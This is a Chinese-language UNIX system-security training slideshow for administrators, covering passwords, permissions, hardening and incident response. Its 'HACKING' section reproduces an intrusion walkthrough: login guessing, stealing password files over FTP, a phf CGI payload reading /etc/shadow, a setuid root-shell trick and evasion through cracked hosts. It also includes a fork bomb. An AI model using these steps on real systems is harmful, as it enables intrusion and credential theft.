云嘉区网中心研习课程.ppt

1,雲嘉區網中心研習課程,系統安全管理,國立中正大學電算中心,張永榴,changccunix.ccu.edu.tw,2,系統安全管理,雲嘉區網中心研習課程,PART I.UNIX Security BasicsPART II.Enforcing Security on your SystemPART III.Handling Security Incidents,3,系統安全管理,雲嘉區網中心研習課程,PART I.UNIX Security Basics1.Introduction2.Users and Passwords3.The UNIX Filesystem,4,系統安全管理,雲嘉區網中心研習課程,A computer is secure if you can depend on it and its software to behave as you expect it to.,The three parts of UNIX:The kernel Standard utility programs System database files,Introduction,5,系統安全管理,雲嘉區網中心研習課程,Prevention：1.Backup2.Monitoring system log files and running processes.3.upgrade OS patches4.Dont install illegal packages.5.Read news about security,6,系統安全管理,雲嘉區網中心研習課程,Users and Passwords:,The crypt AlgorithmPassword Salt Encrypted Password-nutmeg Mi MiqkFWCm1fNJIellen1 ri ri79KNd7V6.SkSharon././2aN7ysff3qMnorahs am amfIADT2iqjAfnorahs 7a 7azfT5tIdyh0I,/etc/passwd filesroot:fi3sED95ibqR6:0:1:System Operator:/:/bin/cshdaemon:*:1:1:/tmpuucp:ooRoMN9FyZNE:4:4:/usr/spool/uucpublic:/usr/lib/uucp/uucicorachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/csharlin:f8fk3jlOrf34:182:100:Arlin Steinberg:/u/arlin:/bin/csh,7,系統安全管理,雲嘉區網中心研習課程,Bad Passwords:login name,anybodys name,birth date phone number,a place,all the same letter,word in the English dictionary,all numbers,less than 6 letters,.Adminstrative Techniques assign passwords to users crack your own passwords shadow password files password aging and expirationSummary ensure every account has a password ensure every user choose a strong password use shadow password file,if available,8,系統安全管理,雲嘉區網中心研習課程,The UNIX FilesystemFile permissions read,write,execute The umask commandSUID,SGID%ls-l/bin/su-rwsr-sr-x 1 root 16384 Sep 3 1989/bin/su%find/-perm 4000-print,9,系統安全管理,雲嘉區網中心研習課程,1.Defending Your Accounts2.Securing Your Data3.The UNIX Log Files4.Modems5.Networks and Security6.NFS7.COPS8.Patch Installation9.Firewall,Part II.Enforcing Security on Your System,10,系統安全管理,雲嘉區網中心研習課程,Defending Your Accounts,Dangerous Accounts accounts without passwords defaults accounts accounts that run a single command open accounts Protecting the root Accounts secure terminals the wheel group,11,系統安全管理,雲嘉區網中心研習課程,Securing Your DataFile backups 1.Why back up?user error,system staff error,hardware error,software error,electronic break-ins,natural disaster 2.What should you back up?user files,system databases,any system directories 3.How long back up?Database daily checking/etc/passwd,/etc/group,/etc/rc*,/etc/ttys,/etc/inittab,/usr/spool/cron/crontabs,/etc/aliases,/etc/exports,/etc/vfstab,/etc/netgroup,12,系統安全管理,雲嘉區網中心研習課程,The UNIX Log Files/usr/adm/lastlog/etc/utmp,/usr/adm/wtmp,/usr/adm/wtmpx/usr/adm/pacct/usr/adm/sulog,13,系統安全管理,雲嘉區網中心研習課程,Modems1.Devices:/dev/modem,/dev/ttys(0-9),/dev/ttyfa,/dev/ttyda,/dev/cua*2.Mode and owner:chmod 600/dev/modem chown root/dev/modem3.Modems hang-up checking:,14,系統安全管理,雲嘉區網中心研習課程,Networks and Security,Trusted ports 01023/etc/services fileRlogin and rsh/etc/hosts.equiv/.rhosts“r”commands in/etc/inetd.conf file/.netrc Remote print/etc/hosts.lpq,15,系統安全管理,雲嘉區網中心研習課程,Networks and Security,Restricting FTP/etc/ftpusers Set EEPROM password#eeprom security-mode=full#eeprom security-password=Changing PROM password:New password:Retype password:Cron jobs:/var/spool/cron/crontabs file Set“CRONLOG=yes”in/etc/default/cron,16,系統安全管理,雲嘉區網中心研習課程,Networks and Security,Finger/etc/inetd.conf kill-1 pid_of_inetd Sendmail 1.debug,wiz,kill command 2.delete decode aliases from alias file.(decode:”|/usr/bin/uudecode”)3.disable the“wizard”password in the sendmail.cf file.Example:#Let the wizard do what she want OWsitrVlWxktZ67,17,系統安全管理,雲嘉區網中心研習課程,Networks and Security,Anonymous FTP 1.create ftp account.2.mkdir ftp/bin ftp/etc ftp/pub 3.cp/bin/ls ftp/bin 4.chmod 111 ftp/pub/ftp/etc ftp/bin ftp/bin/ls 5.cp/etc/passwd ftp/etc/passwd 6.cp/etc/group ftp/etc/group 7.chmod 444 ftp/etc/*8.chown root ftp ftp/etc/ftp/bin 9.chown ftp.ftp ftp/pub 10.chmod 555 ftp,18,系統安全管理,雲嘉區網中心研習課程,NFS,NIS 1./etc/passwd file+:0:0:(wrong)+:*:0:0:(on NIS clients only)2.Netgroup/etc/netgroup(hostname,username,domainname),19,系統安全管理,雲嘉區網中心研習課程,NFS,/etc/exports File exportfs command showmount command,20,系統安全管理,雲嘉區網中心研習課程,COPS File,directory and device files permissions/etc/passwd and/etc/group files SUID files examples:,21,系統安全管理,雲嘉區網中心研習課程,ATTENTION:Security Report for Wed Dec 18 13:30:30 CST 1991from host Warning!A“+”entry in/etc/hosts.equiv!Warning!“.”(or current directory)is in roots path!Warning!Directory/usr/spool/mail is _World_writable!Warning!File/etc/motd is _World_writable!Warning!File/etc/mntab is _World_writable!Warning!File/etc/remote is _World_writable!Warning!File/etc/sm is _World_writable!Warning!File/etc/sm.bak is _World_writable!Warning!File/etc/state is _World_writable!Warning!File/etc/tmp is _World_writable!Warning!File/etc/utmp is _World_writable!Warning!User uucps home directory/var/spool/uucpublic is mode 03777Warning!Password file,line 2,negative user id:nobody:*:-2:-2:/:Warning!Password file,line 11,no password:sync:1:1:/:/bin/syncWarning!Password file,line 12,user sysdiag has uid=0 and is not root sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag,22,系統安全管理,雲嘉區網中心研習課程,Patch Installation ftp:/sunsite.ccu.edu.twexample:,23,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,一、Destruction Attacks:1.Reformating a disk partition=Prevent anyone from acessing the machine in single-user mode.Protect the superuser account.2.Deleting critical files:=Protect system files by specifying approicate modes(eg.,755 or 711).Protect the superuser account.3.turn off power=Put the computer in a physically location.,24,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,二、Overload Attacks1.Process Overload Attacks:example.main()while(1)fork();=Solaris:/etc/system set maxproc=1002.System Overload:=set your own priority as high as you can with the renice command,25,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,三、Disk Attacks1.Disk Full Attacks:du command find/-size+1000-exec ls-l;quote-f/dev/sd0a set quotas(edquota)reserved space2.Swap Space Attacks:for Solaris:#mkfile 50m/home#swap-a/home for SUNOS:#mkfile 50m/home#swapon/home,26,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,四、Tree Structure Attacks:example:#!/bin/kshwhile mkdir_anotherdo cd./another cp/bin/cc fillitupdone=DIY=shell script=delete the inode of the top directory#boot-s#ls-i another#df another#/usr/sbin/clri/dev/dsk/c0t2d0s2 1491#fsck/dev/dsk/c0t2d0s2,27,系統安全管理,雲嘉區網中心研習課程,PART III.Handling Security Incidents,系統入侵檢測：1.檢查連線記錄檔中是否有不尋常的來 源或操作動作。2.找出系統中所有setuid及setgid檔案3.檢查系統執行檔是否被修改，如login,su,telnet,netstat,ifconfig,ls,find,du,df sync,任何在/etc/inetd.conf中記載的 程式。4.檢查系統中是否有正在執行網路監聽 程式。5.檢查所有由cron和at所執行的程式。,28,系統安全管理,雲嘉區網中心研習課程,PART III.Handling Security Incidents,6.檢查/etc/inetd.conf是否被更改、對應程 式是否正確。7.檢查/etc/passwd內容及檔案屬性的更動。8.檢查系統和網路設定檔。hosts.equiv,hosts.lpd,.rhosts9.找出系統不尋常或隱藏的檔案。find/-name“.“-print find/-namee“.*”-print10.檢查機器是否被入侵，必須檢查 所有區域網路上機器。,29,系統安全管理,雲嘉區網中心研習課程,PART III.Handling Security Incidents,從log files發現入侵者蹤跡.使用者在奇怪的時間內進入 last.系統不明原因的重新啟動 w,last.系統時間不明原因改變 time.來自sendmail,ftp等不尋常的錯誤 訊息/var/adm/syslog,xferlog.未經授權或可疑的 su 指令使用/usr/adm/sulog.使用者來自陌生站台 who,last,30,系統安全管理,雲嘉區網中心研習課程,PART III.Handling Security Incidents,發現入侵事件一、確認並瞭解問題二、阻止損害三、確定您的診斷並決定損害四、恢復系統五、處理根本原因六、執行相關復原工作,31,系統安全管理,雲嘉區網中心研習課程,HACKING,進入主機有好幾種方式,可以經由Telnet(Port 23)或SendMail(Port 25)或FTP或WWW(Port 80)的方式進入,一台主機雖然只有一個位址,但是它可能同時進行多項服務,所以如果你只是要進入該主機,這些Port都是很好的進行方向.,示範進入主機的方法:(By CoolFire)(首先要先連上某一台你已經有帳號的 Telnet 主機,當然最好是假的,也就是 Crack過的主機,然後利用它來Crack 別的主機,才不會被別人以逆流法查出你的所在),Digital UNIX()(ttypa)login:FakeNamePassword:Last login:Mon Dec 2 03:24:00 from 255.255.0.0(我用的是,當然是假的囉,都已經經過修改了啦!沒有這一台主機啦!別怕!別怕!以下的主機名稱都是假的名稱!,32,系統安全管理,雲嘉區網中心研習課程,Digital UNIX V1.2C(Rev.248);Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software(Rev.248)Digital UNIX Chinese Support V1.2C(rev.3)(嗯.進來了!開始攻擊吧!本次的目標是.),telnet(Telnet 試試看.)Trying 111.222.255.255.Connected to.Escape character is.Password:Login incorrect(沒關係,再來!)cool login:hinetPassword:Login incorrect,(都沒猜對,這邊用的是猜的方法,今天運氣好像不好),HACKING(Continued),33,系統安全管理,雲嘉區網中心研習課程,(重來,換個Port試試看!)telnet 111.222.255.255 80Trying 111.222.255.255.Connected to 111.222.255.255.Escape character is.,ErrorError 400Invalid request(unknown method)CERN-HTTPD 3.0AConnection closed by foreign host.,(哇哩!連密碼都沒得輸入,真是.再來!要有恆心!)(換FTP Port試試),HACKING(Continued),34,系統安全管理,雲嘉區網中心研習課程,ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP server(Version wu-2.4(1)Tue Aug 8 15:50:43 CDT 1995)ready.Name(111.222.255.255:FakeName):anonymous331 Guest login ok,send your complete e-mail address as password.Password:,230-Welcome,archive user!This is an experimental FTP server.If have any230-unusual problems,please report them via e-mail to 230-If you do have problems,please try using a dash(-)as the first character230-of your password-this will turn off the continuation messages that may230-be confusing your ftp client.230-,230 Guest login ok,access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.,(哇!可以用anonymous進來耶!password部份輸入aaa就好了,不要留下足跡喔!),HACKING(Continued),35,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),ftp ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.,(嗯嗯.太好了!進來了!下一個目標是.),ftp cd etc250 CWD command successful.ftp get passwd(抓回來!)200 PORT command successful.150 Opening BINARY mode data connection for passwd(566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds(0.93 Kbytes/s),(喔.這麼容易嗎?),36,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),ftp!cat passwd(看看!)root:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1:/home/ftp:/bin/bash,(哇哩.是Shadow 的.真是出師不利.),ftp bye221 Goodbye.,37,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),(不信邪.還是老話,要有恆心.)(FTP 不行,再Telnet看看!),telnet Trying 111.222.255.255.Connected to.Escape character is.Password:Login incorrect,(又猜錯!),cool login:hackmePassword:Last login:Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstandprogress.cool:$,(哇哈!哪個笨root用system name作username和password!總算沒白玩!),38,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),抓回來一個“亂七八糟”的/etc/passwd,你以為我的真那麼笨嗎?guest所抓回來的能是甚麼好東西?所以繼續上次的攻擊行動.我們已經猜到了一個不是guest的username及password.就以它來進入主機瞧瞧!,Digital UNIX()(ttypa)login:FakeNamePassword:Last login:Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C(Rev.248);Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software(Rev.248)Digital UNIX Chinese Support V1.2C(rev.3)(嗯.進來了!開始攻擊吧!本次的目標是.),telnet(Telnet 試試看.)Trying 111.222.255.255.Connected to.Escape character is.cool login:hackmePassword:(一樣輸入hackme),39,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),Last login:Mon Dec 1 12:44:10 from Linux 1.2.13.cool:$cd/etccool:/etc$ls pa*passwd passwd.OLD passwd.oldcool:/etc$more passwd,(看看有沒有Shadow.),root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john:,(正點!一點都沒有防備!),cool:/etc$exitlogout(走人!.換FTP上場!)Connection closed by foreign host.,40,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),ftp Connected to.220 cool FTP server(Version wu-2.4(1)Tue Aug 8 15:50:43 CDT 1995)ready.Name(:66126):hackme331 Password required for hackme.Password:230 User hackme logged in.Remote system type is UNIX.Using binary mode to transfer files,ftp cd/etc250 CWD command successful.ftp get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd(350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds(1.9 Kbytes/s),ftp!cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john:,(看看!呵!假不了!),41,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),二、CGI Hole(phf.cgi),http:/www.hackme.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdQuery Results/usr/local/bin/ph-m alias=x/bin/cat/etc/passwdroot:x:0:0:0000-Admin(0000):/:/sbin/shdaemon:x:1:1:0000-admin(0000):/:bin:x:2:2:0000-admin(0000):/usr/bin:sys:x:3:3:0000-admin(0000):/:adm:x:4:4:0000-admin(0000):/var/adm:lp:x:71:8:0000-lp(0000):/usr/spool/lp:smtp:x:0:0:mail daemon user:/:uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:nobody:x:60001:60001:uid no body:/:hansin:x:109:1:/home1/hansin:/usr/lib/rshdayeh:x:110:1:/home1/dayeh:/usr/lib/rsh,再試http:/www.hackme.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow,42,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),#1 FTP 入侵法?不太實用的方法!,1 連接到 FTP Server.2 當系統要求你輸入User Name時Enter不管它3 Password 輸入-quote user ftp4 接著再輸入-quote cwd root5 再輸入-quote pass ftp,這種方法似乎只能用在很老舊的FTP Server 上,以國內目前的機器應該都不會成功的,如果你想要試試的話,找找國外大學的FTP Server試試看吧!依照上面的步驟會產生甚麼樣的結果?Hee.he.你就是root啦!,43,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),#2 Linux 1.2.13漏洞之一?成為root吧!,Linux 1.2.13有許多的漏洞,如果你所使用的版本是較新的話,你大可放心,不然你也可以依照下面的方法試試你的系統!,1 Telnet 到 2 Login之後輸入-finger 3 再-finger,等root來login4 用WWW Browser連到5 Location 輸入-回到Telnet軟體-cp/bin/sh/tmp/.sh”7 再輸入-chmod 4755/tmp/.sh(Youre root now!),44,系統安全管理,雲嘉區網中心研習課程,HACKING(Continued),#3 Xfree86 3.1.2 有個漏洞能讓別人刪除“任何”檔案?是的!包括etc/passwd!,-cut here,start code exploit.sh-#!/bin/shecho Running exploit to check the Xfree86 3.1.2 hole!echo Creating file called/tmp/blah which will contain a few words.echo This version is NOT exploitable!/tmp/blahln-s/tmp/blash/tmp/.tX0-lockstartxecho Now Check/tmp/blah and if it says:echo This version is NOT exploitable!echo then the version you have is not exploitable!echo Otherwise,it should have a few numbers,then it is exploitable!-cut here,end of code exploit.sh-,要怎麼補這個漏洞呢?1將它設成 superuser 才能執行!用 chmod 4700 指令.2作一個group,只將值得相信的人加入此 group,使該檔案 屬此 group 才能執行.,45,系統安全管理,雲嘉區網中心研習課程,有關系統安全網頁,1.台灣電腦網路危機處理中心 http:/www.cert.org.tw2.系統安全工作室 http:/networking/474/3.完全防Hack手冊 http:/fly.to/jlhack4.USA cert http:/www.cert.org5.系統安全討論區 http:/bbs.nsysu.edu.tw/planetxt/boards/security/,